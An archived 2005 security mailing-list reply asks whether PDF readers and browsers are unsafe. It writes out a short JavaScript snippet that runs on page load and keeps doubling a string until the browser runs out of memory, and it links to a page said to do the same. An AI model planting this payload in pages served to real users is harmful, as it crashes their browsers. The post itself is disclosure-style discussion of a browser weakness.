Date: Thu Sep 22 10:52:59 2005
From: gautam.bipin at gmail.com (Bipin Gautam)
Subject: PDF's unsafe?

On 9/21/05, Geo. <geoincidents@....net> wrote:
> Haven't any of the security firms checked out adobe pdf reader to see if
> it's safe? It took 5 minutes to create this nonsense
> http://www.nthelp.com/test.pdf and that's just using the standard features.
> I hate to think what a real hacker could do with a pdf.
>
> Geo.
>
Even if you have the option in IE "Play videos in webpage"
unchecked... the following page will render....

http://bipin.sosvulnerable.net/temp/fdrd.html

& probably your OS will close the browser after it runs out of memory.

Or maybe try this:

/* ------------
<body onload="hUNT()">
<script language="JavaScript"><!--
var szhUNT="...cauz its a jungle out there!"
function hUNT()
{szhUNT=szhUNT + szhUNT
window.status="String Length is: "+szhUNT.length
window.setTimeout('hUNT()',1);}
// --></script>
--------------------------- */
So IE/Mozilla is unsafe?

Bipin Gautam
http://bipin.tk

Zeroth law of security: The possibility of poking a system from lower
privilege is zero unless & until there is possibility of direct,
indirect or consequential communication between the two...
